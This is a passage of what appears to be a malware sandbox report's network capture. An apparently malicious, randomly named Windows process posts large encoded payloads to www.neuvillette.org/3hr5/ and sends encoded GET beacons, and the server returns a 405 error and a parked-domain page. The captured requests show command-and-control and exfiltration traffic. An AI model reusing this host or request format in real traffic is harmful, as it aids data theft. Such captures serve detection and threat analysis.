                                                                                                                              Dec 4, 2023 15:25:07.979127884 CET2626OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.neuvillette.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.neuvillette.org
                                                                                                                              Referer: http://www.neuvillette.org/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 6e 33 2f 66 4c 6f 41 2f 49 4a 57 6e 34 2b 4a 67 52 67 42 43 4f 69 73 33 64 51 46 71 55 4f 56 59 4b 70 49 57 38 73 68 46 78 4b 4c 38 64 31 6e 69 51 77 6e 4b 4b 4f 69 79 32 69 7a 73 2b 53 5a 4c 55 42 36 35 39 4a 39 56 74 77 43 77 65 4c 72 68 54 63 65 52 6b 71 65 43 64 65 54 6d 7a 6c 4a 54 37 64 68 6d 4c 73 7a 44 56 4e 4b 49 55 63 32 71 32 52 66 79 75 4c 31 67 43 63 71 59 4e 36 44 49 4f 2f 4f 48 59 39 4f 6d 34 71 59 67 75 50 54 31 57 35 2f 49 78 4d 36 6a 34 32 6e 2b 57 65 36 6e 2f 44 31 4b 6f 77 61 4c 78 46 50 79 66 5a 6d 55 65 72 2f 39 43 6d 70 6d 32 66 30 4f 34 55 77 4c 44 75 4c 77 67 50 67 38 68 63 7a 61 47 63 2f 6d 68 35 4a 69 66 41 36 30 36 74 52 4f 6a 4b 64 5a 6b 79 56 75 68 64 70 2f 4b 38 50 58 7a 54 32 73 6e 38 52 50 37 64 70 41 36 64 51 66 61 69 77 6d 6f 69 53 63 49 2b 6d 36 4b 6f 33 31 42 51 46 76 43 45 4a 58 4d 65 58 34 51 41 68 69 44 49 35 4b 37 32 47 6a 55 67 48 67 77 61 4c 59 6e 7a 33 41 72 4b 62 61 49 5a 37 30 67 44 54 64 76 6b 74 64 41 36 45 36 6e 55 57 42 6a 55 5a 57 30 71 54 70 59 4e 43 7a 6d 37 38 4b 55 73 6e 71 48 53 75 59 55 37 50 55 56 58 50 45 38 53 44 2f 51 69 37 67 6f 2f 69 74 35 6a 42 45 5a 62 76 42 56 76 52 33 34 76 6f 56 55 75 71 63 77 2f 48 4c 70 4c 30 78 38 58 75 30 34 38 77 6e 7a 77 59 38 4c 6f 38 71 46 47 50 30 42 66 64 75 50 4e 77 73 37 4e 4d 49 6d 65 65 61 58 2f 6d 56 77 52 69 52 33 4f 41 64 73 59 7a 78 70 35 4b 62 57 4f 44 79 46 34 4e 6f 31 5a 4b 32 33 2f 78 50 5a 6b 6d 6d 79 6d 38 38 5a 68 4a 36 39 6d 33 77 61 76 79 54 46 42 52 65 48 43 52 49 55 62 2b 39 62 76 31 43 46 52 55 47 67 5a 7a 58 72 59 58 6c 39 41 64 38 66 58 6a 35 75 76 37 79 4a 76 69 45 42 4d 67 63 48 38 4b 4c 6e 55 54 69 68 56 45 64 73 4d 63 53 36 39 62 36 47 53 45 76 2b 67 56 58 2f 35 75 78 2f 67 45 74 2f 39 61 56 62 38 73 4a 36 72 73 78 41 44 31 34 39 32 33 38 73 70 74 41 2b 43 73 54 38 4c 59 41 2f 68 73 4c 49 2f 6d 48 39 70 37 49 37 2f 43 76 35 2b 70 78 75 48 52 50 47 59 35 39 4d 6c 65 46 42 49 57 48 33 51 6f 39 30 47 63 74 48 70 4e 6a 54 4b 70 4f 77 4f 65 34 52 52 63 53 42 77 44 4e 77 53 32 6e 39 48 6e 6d 37 6b 50 32 59 35 6e 33 5a 55 53 44 4b 72 63 4e 4d 45 49 72 79 4a 4f 6e 39 37 49 35 49 34 4f 43 47 74 61 4c 32 47 4e 6c 6a 46 65 75 73 2b 65 2f 51 5a 42 2b 7a 62 6d 71 47 38 58 79 33 32 53 52 64 70 50 45 47 42 39 36 66 64 67 4a 59 75 79 73 71 6b 61 70 76 52 4d 72 4c 5a 30 4a 33 45 31 65 39 77 66 69 31 50 6d 59 74 47 2f 79 43 31 4b 4d 2f 4a 33 53 49 32 62 42 45 44 75 38 4c 2f 75 58 6e 69 59 53 61 7a 30 77 56 73 44 57 51 55 5a 42 4f 75 34 41 43 73 36 35 2b 4c 78 66 56 76 6a 56 37 6a 6a 7a 6e 2f 73 69 42 42 45 72 38 6a 2f 65 45 66 5a 64 73 49 55 6f 47 30 55 47 50 43 74 68 43 51 41 76 70 48 63 36 33 46 77 75 68 51 30 49 55 70 53 53 6b 4d 6b 47 39 32 67 46 37 73 31 43 72 6b 38 71 6a 2b 74 77 43 63 63 79 77 64 31 64 4c 35 69 42 66 69 6e 76 58 6e 70 73 4d 49 6e 46 49 6f 4b 69 32 36 30 6e 39 75 42 58 4f 6f 6c 4e 45 64 6f 4a 41 76 55 69 75 62 72 71 52 4e 54 5a 71 34 55 4c 4a 74 78 31 42 66 79 39 75 46 46 59 6f 76 47 65 4f 69 79 30 62 59 6c 44 67 4e 48 32 4f 4e 45 4a 4e 2f 45 64 4a 56 36 62 78 2b 6b 63 6e 48 63 72 4b 71 70 61 7a 48 44 51 38 63 56 71 4e 35 71 51 38 74 4e 31 57 39 53 37 56 77 36 46 4d 73 45 52 4d 43 67 4a 31 61 72 4b 36 52 67 34 32 65 68 42 75 43 46 58 44 6b 4b 78 48 65 38 4a 7a 6f 2f 2f 50 54 51 78 6c 75 67 69 61 6e 6e 30 7a 71 55 6f 36 77 59 50 66 7a 6e 4a 73 6a 34 6c 4e 7a 69 79 57 34 53 2b 59 62 74 34 46 69 57 37 65 37 63 35 56 68 6e 41 77 63 4c 6f 77 37 44 56 34 63 53 34 4a 58 6f 44 5a 62 48 54 54 51 79 72 4c 57 53 34 56 33 47 71 71 49 46 6d 50 50 4a 69 72 77 31 79 69 64 70 69 76 59 35 7a 31 51 37 69 6d 6c 58 4b 38 67 6b 62 4b 36 58 30 47 70 62 49 65 54 5a 52 6b 6e 67 4b 37 51 6d 74 58 61 49 4b 78 51 70 45 77 33 44 33 61 50 6b 65 5a 71 63 74 4b 4b 58 68 39 65 53 50 38 79 45 52 52 46 73 45 50 63 6e 37 46 47 30 5a 4e 55 55 35 4c 45 42 42 61 75 51 49 41 77 53 4c 67 35 7a 57 35 69 67 51 70 53 78 42 37 52 52 33 79 5a 74 76 77 35 4a 42 77 61 74 4d 31 57 78 67 65 53 56 67 4f 43 36 33 54 44 57 38 4e 6d 39 51 4d 32 54 33 38 75 54 4d 57 77 52 71 75 45 71 57 44 78 4c 49 54 6e 46 58 52 78 51 34 2b 48 6e
                                                                                                                              Data Ascii: TZd=n3/fLoA/IJWn4+JgRgBCOis3dQFqUOVYKpIW8shFxKL8d1niQwnKKOiy2izs+SZLUB659J9VtwCweLrhTceRkqeCdeTmzlJT7dhmLszDVNKIUc2q2RfyuL1gCcqYN6DIO/OHY9Om4qYguPT1W5/IxM6j42n+We6n/D1KowaLxFPyfZmUer/9Cmpm2f0O4UwLDuLwgPg8hczaGc/mh5JifA606tROjKdZkyVuhdp/K8PXzT2sn8RP7dpA6dQfaiwmoiScI+m6Ko31BQFvCEJXMeX4QAhiDI5K72GjUgHgwaLYnz3ArKbaIZ70gDTdvktdA6E6nUWBjUZW0qTpYNCzm78KUsnqHSuYU7PUVXPE8SD/Qi7go/it5jBEZbvBVvR34voVUuqcw/HLpL0x8Xu048wnzwY8Lo8qFGP0BfduPNws7NMImeeaX/mVwRiR3OAdsYzxp5KbWODyF4No1ZK23/xPZkmmym88ZhJ69m3wavyTFBReHCRIUb+9bv1CFRUGgZzXrYXl9Ad8fXj5uv7yJviEBMgcH8KLnUTihVEdsMcS69b6GSEv+gVX/5ux/gEt/9aVb8sJ6rsxAD149238sptA+CsT8LYA/hsLI/mH9p7I7/Cv5+pxuHRPGY59MleFBIWH3Qo90GctHpNjTKpOwOe4RRcSBwDNwS2n9Hnm7kP2Y5n3ZUSDKrcNMEIryJOn97I5I4OCGtaL2GNljFeus+e/QZB+zbmqG8Xy32SRdpPEGB96fdgJYuysqkapvRMrLZ0J3E1e9wfi1PmYtG/yC1KM/J3SI2bBEDu8L/uXniYSaz0wVsDWQUZBOu4ACs65+LxfVvjV7jjzn/siBBEr8j/eEfZdsIUoG0UGPCthCQAvpHc63FwuhQ0IUpSSkMkG92gF7s1Crk8qj+twCccywd1dL5iBfinvXnpsMInFIoKi260n9uBXOolNEdoJAvUiubrqRNTZq4ULJtx1Bfy9uFFYovGeOiy0bYlDgNH2ONEJN/EdJV6bx+kcnHcrKqpazHDQ8cVqN5qQ8tN1W9S7Vw6FMsERMCgJ1arK6Rg42ehBuCFXDkKxHe8Jzo//PTQxlugiann0zqUo6wYPfznJsj4lNziyW4S+Ybt4FiW7e7c5VhnAwcLow7DV4cS4JXoDZbHTTQyrLWS4V3GqqIFmPPJirw1yidpivY5z1Q7imlXK8gkbK6X0GpbIeTZRkngK7QmtXaIKxQpEw3D3aPkeZqctKKXh9eSP8yERRFsEPcn7FG0ZNUU5LEBBauQIAwSLg5zW5igQpSxB7RR3yZtvw5JBwatM1WxgeSVgOC63TDW8Nm9QM2T38uTMWwRquEqWDxLITnFXRxQ4+Hn3l/LAVbX2v++2LXh7y1SqPhK7B7HkwzOPpU+QaSt6/SZQMZO/wx5twY+taWdDZsiP6A11WeiFqix7f0CLvyrM8wnYRW0GQumLO6zuyXj0g2g4gQ5G7eGdc1QsjiaIiRj19cNXVY8kPhRmBFDZGEVY0uD6m8SEa6BKu9eibhdwkjvc+FcdxusvKdDTslUnlrjvtkcvcZWzdwLUs3GYnu+hYsAfE7zMTC4oOsWq3alFEmAR8UntR9UajIXzAAfuVZ7z84iN6DavTvXccuOzwrYzlNsudXqHm8rh1IoPYfIK6iAaJkO8YrINWsWZLD4V3i514b6RfEQ5GgfmZWB+fzCK9fReXuzNg3p+EkQho2D/QHoQ5uVFpMar3q5w/kPerR/rdvB5EdfFj86ZuYuHe+9/msCIDJtMp8x0sV/y1SiyDaAuICSG3VJT5b791EXiTwOfFrQDndqMi7IM6h+5WjVIMKVE/ByZ0wSMCZL4zRFR36J+yysCHbfN3+DftJ1rdaZJwju730qbYZpjSM+5ir06xlnpPE9Kb7l+UjECTZM65Y768p4sU0vC/ww+vxyxH6++jy/80knotNI5s/S4rVkdb3sOH9e5gtSae05wrbRdX4Uk1aWutKFzCE2Mlk
                                                                                                                              Dec 4, 2023 15:25:07.979233027 CET10342OUTData Raw: 2b 55 53 2b 6e 6a 59 79 67 77 6e 70 73 50 4b 67 68 77 43 37 42 59 58 67 5a 72 6a 65 59 6b 2b 57 34 44 45 55 61 7a 47 34 54 64 67 2f 58 37 41 43 4d 42 39 55 55 47 30 71 45 31 4f 49 74 39 39 41 59 4f 73 4e 63 75 38 6f 2b 72 4e 4a 30 47 4f 46 48 31
                                                                                                                              Data Ascii: +US+njYygwnpsPKghwC7BYXgZrjeYk+W4DEUazG4Tdg/X7ACMB9UUG0qE1OIt99AYOsNcu8o+rNJ0GOFH1bW84asNWPrQXclrj8nNLf7S66kwXByIoxy77c6VGguiuGgW0VmkRIW5Qm+RrZAlsRwpUR8Nz9X26lXYI61pqio1WfIg16AaVOIusb0pEv/L58QO065sBF3E5MaeKOGIeH6CEKdTn44gZI386jw6TWk7OTKeNpl5Lz
                                                                                                                              Dec 4, 2023 15:25:08.161230087 CET1340OUTData Raw: 75 66 63 4e 45 55 69 48 46 6f 77 37 4b 52 53 49 43 70 4b 31 5a 6a 74 5a 43 2b 69 56 37 34 2f 78 62 57 62 38 73 4c 6d 46 54 47 6a 73 4e 31 73 6c 33 2b 35 55 78 43 59 4d 61 47 50 2f 2f 4f 6e 56 52 4d 4a 45 52 75 6e 36 6c 70 62 43 59 67 71 77 76 79
                                                                                                                              Data Ascii: ufcNEUiHFow7KRSICpK1ZjtZC+iV74/xbWb8sLmFTGjsN1sl3+5UxCYMaGP//OnVRMJERun6lpbCYgqwvyv4MMSovrNglNj2Lk5jrzCPdefSn+8z2lwNQvYwVd0uYxU+biPWDsioyXz5Wx+CuepaNQ89cdRn2cJARmwW5RESxohreMv63DfYohW6qEHFrTfFJfXzx5i1YAkMCs+nQG1Es7NZm1M8/3yVNf5pfxlbieFC0a2Eiim
                                                                                                                              Dec 4, 2023 15:25:08.161313057 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:25:08 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                                                                                                              Dec 4, 2023 15:25:08.161417007 CET3912OUTData Raw: 30 71 69 31 70 4f 34 52 4f 7a 68 54 55 72 58 72 30 78 43 4d 6a 58 76 47 6c 50 37 4c 58 30 6d 41 51 32 70 4b 4c 57 71 78 78 66 4b 36 33 51 75 4d 6f 49 6c 6a 43 76 6b 57 6a 31 67 56 6f 66 79 35 50 67 72 72 50 69 6b 32 50 6f 6e 39 63 4b 54 4d 43 73
                                                                                                                              Data Ascii: 0qi1pO4ROzhTUrXr0xCMjXvGlP7LX0mAQ2pKLWqxxfK63QuMoIljCvkWj1gVofy5PgrrPik2Pon9cKTMCsB8eeg8N4/LK8WATuVqs2N7UxQTPBDFeqETAm4okk/Funt4OK+jyBocDW7YGHpu4ZfHW7pmpZJHwOLYsMkVnsKpHPK5vLUXWbn9VXktPOQohgHmDjCgjVrpNR4P8qxGhm0NCQ2KlNlHmxTVdLnIo3x5Q5c47rzoWLY
                                                                                                                              Dec 4, 2023 15:25:08.161603928 CET1340OUTData Raw: 65 30 2b 78 6a 2f 4f 4e 58 52 58 55 38 6f 38 64 76 66 77 67 63 70 57 57 55 39 63 77 61 6f 34 62 66 56 33 32 7a 32 55 4b 47 54 4f 4f 58 68 47 73 71 76 66 49 2f 30 48 52 50 79 42 64 4b 58 4b 45 5a 43 6d 31 6f 5a 6a 78 65 32 32 5a 62 6f 4b 39 51 43
                                                                                                                              Data Ascii: e0+xj/ONXRXU8o8dvfwgcpWWU9cwao4bfV32z2UKGTOOXhGsqvfI/0HRPyBdKXKEZCm1oZjxe22ZboK9QCY4UvE6WzrIcLtlPTI4t0/QqAtKIJ94Yn++rCVObhijqwhw/lRr7yZ70yctB+LxoshZipN0u1debtZiDkqLs7wvJUKKWbEwZkYA6CLVGFFzQmdMUwsG+z7qHS4FFexqS6UIWQoNP2NqJi1pj1kpWA2GTr+6I+76284
                                                                                                                              Dec 4, 2023 15:25:08.161773920 CET3912OUTData Raw: 48 77 38 6e 36 6e 6c 77 44 64 41 70 65 31 6c 31 52 63 39 38 37 43 39 39 61 30 55 4c 44 41 2b 57 59 6d 61 75 51 46 6a 31 75 68 65 6d 76 2b 63 65 33 2b 55 6a 32 6a 58 77 68 39 70 44 2f 67 55 51 69 6a 30 7a 35 4a 64 6f 5a 56 70 35 4f 57 76 54 7a 62
                                                                                                                              Data Ascii: Hw8n6nlwDdApe1l1Rc987C99a0ULDA+WYmauQFj1uhemv+ce3+Uj2jXwh9pD/gUQij0z5JdoZVp5OWvTzb0C6SLERuaQGAzGXrwmm/pL+npAD4BqIiEL99KiWVaOJ9xCiHc1wKV0jTjqBnrXqtLBO1mlqRoiDVYIA6p+9jCPtPhUeguIJMsJ1mAqXXjdAyHPQEK5jtmmvXr7zI/iED7jxkECmpBtIbBE9rPSEU1lLQOlRTgoLb4
                                                                                                                              Dec 4, 2023 15:25:08.162116051 CET15486OUTData Raw: 6b 64 42 6f 63 42 6d 6d 43 63 62 51 32 6e 39 79 35 5a 63 71 56 39 49 2f 4b 38 47 36 55 45 66 55 32 7a 48 56 50 73 55 55 54 33 2f 72 65 79 59 4d 73 61 4a 79 7a 6e 63 59 4a 64 75 33 2f 4c 48 4a 33 72 6e 7a 45 4c 44 57 56 2f 35 4f 55 41 31 74 53 38
                                                                                                                              Data Ascii: kdBocBmmCcbQ2n9y5ZcqV9I/K8G6UEfU2zHVPsUUT3/reyYMsaJyzncYJdu3/LHJ3rnzELDWV/5OUA1tS81n0SkzJjP9xvpuYVILRd1UKvfxQDccTjWfOomM7QCYjlf9ebUIndGxRnSSjysySq6WTholcVuFRP/MG/OqdmhI1aLH2VsG1bzomHn7bz7/3MxcLkX+chlp15MGo7bzmHQlXNeo7I2qemQU0N9yPO6T6NaohB+b7Mj
                                                                                                                              Dec 4, 2023 15:25:08.343354940 CET5198OUTData Raw: 79 64 41 4f 68 6c 46 6e 33 76 69 41 51 43 75 65 2f 6b 4c 42 5a 43 32 4a 4f 77 73 48 39 47 56 2b 31 39 35 2b 64 55 36 5a 61 37 78 4f 4e 73 6a 78 6f 61 6a 51 4e 79 65 2f 49 34 6f 73 6c 46 4e 70 77 5a 50 69 41 56 5a 61 61 48 38 41 66 56 36 4f 31 71
                                                                                                                              Data Ascii: ydAOhlFn3viAQCue/kLBZC2JOwsH9GV+195+dU6Za7xONsjxoajQNye/I4oslFNpwZPiAVZaaH8AfV6O1qq6FWYizkDpQGfZ4Ece/Ra9ADDPS/cjIJMrnENNSQdvh9rMeYgj96tQtjf1ENsORkgSHyMrKlRcJmRb7N7YMxHABbI3BZxMzlSrtjRS3rjgBz5Qdp31T+StOUJcVHvnNDMb1eXA16T/uVeCTgLZytC85OoUbRvES2C
                                                                                                                              Dec 4, 2023 15:25:08.343678951 CET2626OUTData Raw: 61 41 66 62 59 41 2f 35 2f 62 63 65 58 36 55 6e 56 6c 2b 32 4e 6c 66 4d 67 38 2b 7a 4d 30 59 74 42 45 43 6f 59 62 67 50 6b 79 50 78 6b 41 4d 62 73 6f 4d 44 4e 6c 46 70 68 4c 4d 46 6b 32 71 5a 2f 66 62 79 38 6a 51 57 4f 42 34 57 4f 42 48 65 7a 39
                                                                                                                              Data Ascii: aAfbYA/5/bceX6UnVl+2NlfMg8+zM0YtBECoYbgPkyPxkAMbsoMDNlFphLMFk2qZ/fby8jQWOB4WOBHez9BCh+pXlReiSaTydx0RqcgOf+/uZSYW5n6n9uq7Skl169ZExPac/8xS/DYJ+zI8SZsvuHmbHJ+fR02MQEGLcT2C53F0e/PXxGMbGKwWx7/PTCz5x0NwjUPE478iwK/hNczuIW+9vQn9t2lXdVy3IrmaL1pKIpi13B/
                                                                                                                              Dec 4, 2023 15:25:08.343854904 CET7251OUTData Raw: 30 6d 30 64 63 36 32 4d 48 42 68 58 6e 75 72 47 54 72 53 51 42 4a 50 59 52 32 7a 79 6c 6b 6d 53 73 45 4d 31 4c 73 2b 77 33 35 33 39 54 48 52 69 51 5a 75 54 4d 77 39 57 59 4f 6b 42 4a 4b 39 69 58 65 72 49 79 4c 6a 2f 44 32 50 55 38 2f 35 5a 76 4d
                                                                                                                              Data Ascii: 0m0dc62MHBhXnurGTrSQBJPYR2zylkmSsEM1Ls+w3539THRiQZuTMw9WYOkBJK9iXerIyLj/D2PU8/5ZvMQGMqw6oOz1iwTFc4TAr8sbCYbLcI+EmHk3BdyZsMufLZwXttnjknnZzDp5hVZC0lE3GmWdkL41zkPKuGTae2/1SE/Xy7iREhrwrUuHDik+4jKmsULIRsgsAsjesAsdrBWwL84bY8GcAhWFQov2cjbpLKC8lH6s9HD


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              40192.168.11.205017191.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:10.679915905 CET533OUTGET /3hr5/?TZd=q1X/IYN8eKewuN13aiQWFCouSmM7D+QNK5N6gfBg5YPvN3u/YjmPX9Swyhyhl1JXW1KA5roj8jCGf76SGeGao+TTCbXI7mNU4g==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.neuvillette.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:25:10.949726105 CET1340INHTTP/1.1 200 OK
                                                                                                                              date: Mon, 04 Dec 2023 14:25:10 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              vary: Accept-Encoding
                                                                                                                              x-powered-by: PHP/8.1.17
                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_JSwnIoAPI+nigEU4hZlSpVfVxcW1nwN0pzihfecIeI7m9UQhmwPhFV145Fk0WrHPl9IwErlGuqKPGF/96bRysg==
                                                                                                                              last-modified: Mon, 04 Dec 2023 14:25:10 GMT
                                                                                                                              x-cache-miss-from: parking-698fb476bf-mbx66
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 4a 53 77 6e 49 6f 41 50 49 2b 6e 69 67 45 55 34 68 5a 6c 53 70 56 66 56 78 63 57 31 6e 77 4e 30 70 7a 69 68 66 65 63 49 65 49 37 6d 39 55 51 68 6d 77 50 68 46 56 31 34 35 46 6b 30 57 72 48 50 6c 39 49 77 45 72 6c 47 75 71 4b 50 47 46 2f 39 36 62 52 79 73 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6e 65 75 76 69 6c 6c 65 74 74 65 2e 6f 72 67 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6e 65 75 76 69 6c 6c 65 74 74 65 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 75 76 69 6c 6c 65 74 74 65 2e 6f 72 67 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20
                                                                                                                              Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_JSwnIoAPI+nigEU4hZlSpVfVxcW1nwN0pzihfecIeI7m9UQhmwPhFV145Fk0WrHPl9IwErlGuqKPGF/96bRysg==><head><meta charset="utf-8"><title>neuvillette.org&nbsp;-&nbsp;neuvillette Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="neuvillette.org is your first and best source for all of the information youre looking for. From
                                                                                                                              Dec 4, 2023 15:25:10.949829102 CET1340INData Raw: 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6e 65 75 76 69 6c 6c 65 74 74 65 2e 6f 72 67 20 68 61 73 20
                                                                                                                              Data Ascii: general topics to more of what you would expect to find here, neuvillette.org has it all. We hope you find1062 what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/log
                                                                                                                              Dec 4, 2023 15:25:10.949912071 CET1340INData Raw: 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b
                                                                                                                              Data Ascii: idden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance
                                                                                                                              Dec 4, 2023 15:25:10.949990988 CET1340INData Raw: 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61
                                                                                                                              Data Ascii: ackground:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center
                                                                                                                              Dec 4, 2023 15:25:10.950047970 CET1340INData Raw: 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72
                                                                                                                              Data Ascii: tent-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-si
                                                                                                                              Dec 4, 2023 15:25:10.950103045 CET1340INData Raw: 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74
                                                                                                                              Data Ascii: transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-
